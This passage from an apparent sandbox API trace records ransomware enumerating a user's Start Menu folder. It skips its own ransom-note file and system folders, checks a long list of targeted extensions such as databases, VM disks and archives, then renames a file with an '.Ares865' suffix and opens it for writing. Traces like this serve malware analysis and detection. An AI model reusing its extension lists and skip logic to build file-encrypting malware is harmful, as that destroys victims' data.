nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.122] CloseHandle (hObject=0x120) returned 1 [0092.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.123] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.123] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.123] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.123] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.123] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.123] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.123] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.123] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.123] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.123] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0092.123] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0092.123] lstrlenW (lpString="desktop.ini") returned 11 [0092.123] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned 42 [0092.124] lstrcpyW (in: lpString1=0x2cce452, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0092.124] lstrlenW (lpString="desktop.ini") returned 11 [0092.124] lstrlenW (lpString="Ares865") returned 7 [0092.124] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.124] lstrlenW (lpString=".dll") returned 4 [0092.124] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0092.124] lstrlenW (lpString=".lnk") returned 4 [0092.124] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0092.124] lstrlenW (lpString=".ini") returned 4 [0092.124] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0092.124] lstrlenW (lpString=".sys") returned 4 [0092.124] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0092.124] lstrlenW (lpString="desktop.ini") returned 11 [0092.124] lstrlenW (lpString="bak") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.124] lstrlenW (lpString="ba_") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.124] lstrlenW (lpString="dbb") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.124] lstrlenW (lpString="vmdk") returned 4 [0092.124] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.124] lstrlenW (lpString="rar") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.124] lstrlenW (lpString="zip") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.124] lstrlenW (lpString="tgz") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.124] lstrlenW (lpString="vbox") returned 4 [0092.124] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.124] lstrlenW (lpString="vdi") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.124] lstrlenW (lpString="vhd") returned 3 [0092.124] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.124] lstrlenW (lpString="vhdx") returned 4 [0092.124] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.124] lstrlenW (lpString="avhd") returned 4 [0092.124] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.124] lstrlenW (lpString="db") returned 2 [0092.125] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.125] lstrlenW (lpString="db2") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.125] lstrlenW (lpString="db3") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.125] lstrlenW (lpString="dbf") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.125] lstrlenW (lpString="mdf") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.125] lstrlenW (lpString="mdb") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.125] lstrlenW (lpString="sql") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.125] lstrlenW (lpString="sqlite") returned 6 [0092.125] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.125] lstrlenW (lpString="sqlite3") returned 7 [0092.125] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.125] lstrlenW (lpString="sqlitedb") returned 8 [0092.125] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.125] lstrlenW (lpString="xml") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.125] lstrlenW (lpString="$er") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.125] lstrlenW (lpString="4dd") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.125] lstrlenW (lpString="4dl") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.125] lstrlenW (lpString="^^^") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.125] lstrlenW (lpString="abs") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.125] lstrlenW (lpString="abx") returned 3 [0092.125] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.125] lstrlenW (lpString="accdb") returned 5 [0092.125] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.125] lstrlenW (lpString="accdc") returned 5 [0092.125] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.125] lstrlenW (lpString="accde") returned 5 [0092.126] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.126] lstrlenW (lpString="accdr") returned 5 [0092.126] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.126] lstrlenW (lpString="accdt") returned 5 [0092.126] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.126] lstrlenW (lpString="accdw") returned 5 [0092.126] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.126] lstrlenW (lpString="accft") returned 5 [0092.126] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.126] lstrlenW (lpString="adb") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.126] lstrlenW (lpString="adb") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.126] lstrlenW (lpString="ade") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.126] lstrlenW (lpString="adf") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.126] lstrlenW (lpString="adn") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.126] lstrlenW (lpString="adp") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.126] lstrlenW (lpString="alf") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.126] lstrlenW (lpString="ask") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.126] lstrlenW (lpString="btr") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.126] lstrlenW (lpString="cat") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.126] lstrlenW (lpString="cdb") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.126] lstrlenW (lpString="ckp") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.126] lstrlenW (lpString="cma") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.126] lstrlenW (lpString="cpd") returned 3 [0092.126] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.126] lstrlenW (lpString="dacpac") returned 6 [0092.127] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.127] lstrlenW (lpString="dad") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.127] lstrlenW (lpString="dadiagrams") returned 10 [0092.127] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.127] lstrlenW (lpString="daschema") returned 8 [0092.127] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.127] lstrlenW (lpString="db-journal") returned 10 [0092.127] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.127] lstrlenW (lpString="db-shm") returned 6 [0092.127] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.127] lstrlenW (lpString="db-wal") returned 6 [0092.127] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.127] lstrlenW (lpString="dbc") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.127] lstrlenW (lpString="dbs") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.127] lstrlenW (lpString="dbt") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.127] lstrlenW (lpString="dbv") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.127] lstrlenW (lpString="dbx") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.127] lstrlenW (lpString="dcb") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.127] lstrlenW (lpString="dct") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.127] lstrlenW (lpString="dcx") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.127] lstrlenW (lpString="ddl") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.127] lstrlenW (lpString="dlis") returned 4 [0092.127] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.127] lstrlenW (lpString="dp1") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.127] lstrlenW (lpString="dqy") returned 3 [0092.127] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.127] lstrlenW (lpString="dsk") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.128] lstrlenW (lpString="dsn") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.128] lstrlenW (lpString="dtsx") returned 4 [0092.128] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.128] lstrlenW (lpString="dxl") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.128] lstrlenW (lpString="eco") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.128] lstrlenW (lpString="ecx") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.128] lstrlenW (lpString="edb") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.128] lstrlenW (lpString="epim") returned 4 [0092.128] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.128] lstrlenW (lpString="fcd") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.128] lstrlenW (lpString="fdb") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.128] lstrlenW (lpString="fic") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.128] lstrlenW (lpString="flexolibrary") returned 12 [0092.128] lstrlenW (lpString="fm5") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.128] lstrlenW (lpString="fmp") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.128] lstrlenW (lpString="fmp12") returned 5 [0092.128] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.128] lstrlenW (lpString="fmpsl") returned 5 [0092.128] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.128] lstrlenW (lpString="fol") returned 3 [0092.128] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.128] lstrlenW (lpString="fp3") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.129] lstrlenW (lpString="fp4") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.129] lstrlenW (lpString="fp5") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.129] lstrlenW (lpString="fp7") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.129] lstrlenW (lpString="fpt") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.129] lstrlenW (lpString="frm") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.129] lstrlenW (lpString="gdb") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.129] lstrlenW (lpString="gdb") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.129] lstrlenW (lpString="grdb") returned 4 [0092.129] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.129] lstrlenW (lpString="gwi") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.129] lstrlenW (lpString="hdb") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.129] lstrlenW (lpString="his") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.129] lstrlenW (lpString="ib") returned 2 [0092.129] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.129] lstrlenW (lpString="idb") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.129] lstrlenW (lpString="ihx") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.129] lstrlenW (lpString="itdb") returned 4 [0092.129] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.129] lstrlenW (lpString="itw") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.129] lstrlenW (lpString="jet") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.129] lstrlenW (lpString="jtx") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.129] lstrlenW (lpString="kdb") returned 3 [0092.129] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.130] lstrlenW (lpString="kexi") returned 4 [0092.130] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.130] lstrlenW (lpString="kexic") returned 5 [0092.130] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.130] lstrlenW (lpString="kexis") returned 5 [0092.130] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.130] lstrlenW (lpString="lgc") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.130] lstrlenW (lpString="lwx") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.130] lstrlenW (lpString="maf") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.130] lstrlenW (lpString="maq") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.130] lstrlenW (lpString="mar") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.130] lstrlenW (lpString="marshal") returned 7 [0092.130] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.130] lstrlenW (lpString="mas") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.130] lstrlenW (lpString="mav") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.130] lstrlenW (lpString="maw") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.130] lstrlenW (lpString="mdbhtml") returned 7 [0092.130] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.130] lstrlenW (lpString="mdn") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.130] lstrlenW (lpString="mdt") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.130] lstrlenW (lpString="mfd") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.130] lstrlenW (lpString="mpd") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.130] lstrlenW (lpString="mrg") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.130] lstrlenW (lpString="mud") returned 3 [0092.130] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.131] lstrlenW (lpString="mwb") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.131] lstrlenW (lpString="myd") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.131] lstrlenW (lpString="ndf") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.131] lstrlenW (lpString="nnt") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.131] lstrlenW (lpString="nrmlib") returned 6 [0092.131] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.131] lstrlenW (lpString="ns2") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.131] lstrlenW (lpString="ns3") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.131] lstrlenW (lpString="ns4") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.131] lstrlenW (lpString="nsf") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.131] lstrlenW (lpString="nv") returned 2 [0092.131] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.131] lstrlenW (lpString="nv2") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.131] lstrlenW (lpString="nwdb") returned 4 [0092.131] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.131] lstrlenW (lpString="nyf") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.131] lstrlenW (lpString="odb") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.131] lstrlenW (lpString="odb") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.131] lstrlenW (lpString="oqy") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.131] lstrlenW (lpString="ora") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.131] lstrlenW (lpString="orx") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.131] lstrlenW (lpString="owc") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.131] lstrlenW (lpString="p96") returned 3 [0092.131] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.132] lstrlenW (lpString="p97") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.132] lstrlenW (lpString="pan") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.132] lstrlenW (lpString="pdb") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.132] lstrlenW (lpString="pdm") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.132] lstrlenW (lpString="pnz") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.132] lstrlenW (lpString="qry") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.132] lstrlenW (lpString="qvd") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.132] lstrlenW (lpString="rbf") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.132] lstrlenW (lpString="rctd") returned 4 [0092.132] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.132] lstrlenW (lpString="rod") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.132] lstrlenW (lpString="rodx") returned 4 [0092.132] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.132] lstrlenW (lpString="rpd") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.132] lstrlenW (lpString="rsd") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.132] lstrlenW (lpString="sas7bdat") returned 8 [0092.132] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.132] lstrlenW (lpString="sbf") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.132] lstrlenW (lpString="scx") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.132] lstrlenW (lpString="sdb") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.132] lstrlenW (lpString="sdc") returned 3 [0092.132] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.132] lstrlenW (lpString="sdf") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.133] lstrlenW (lpString="sis") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.133] lstrlenW (lpString="spq") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.133] lstrlenW (lpString="te") returned 2 [0092.133] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.133] lstrlenW (lpString="teacher") returned 7 [0092.133] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.133] lstrlenW (lpString="tmd") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.133] lstrlenW (lpString="tps") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.133] lstrlenW (lpString="trc") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.133] lstrlenW (lpString="trc") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.133] lstrlenW (lpString="trm") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.133] lstrlenW (lpString="udb") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.133] lstrlenW (lpString="udl") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.133] lstrlenW (lpString="usr") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.133] lstrlenW (lpString="v12") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.133] lstrlenW (lpString="vis") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.133] lstrlenW (lpString="vpd") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.133] lstrlenW (lpString="vvv") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.133] lstrlenW (lpString="wdb") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.133] lstrlenW (lpString="wmdb") returned 4 [0092.133] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.133] lstrlenW (lpString="wrk") returned 3 [0092.133] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.134] lstrlenW (lpString="xdb") returned 3 [0092.134] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.134] lstrlenW (lpString="xld") returned 3 [0092.134] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.134] lstrlenW (lpString="xmlff") returned 5 [0092.134] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\desktop.ini.Ares865") returned 60 [0092.134] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0092.137] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 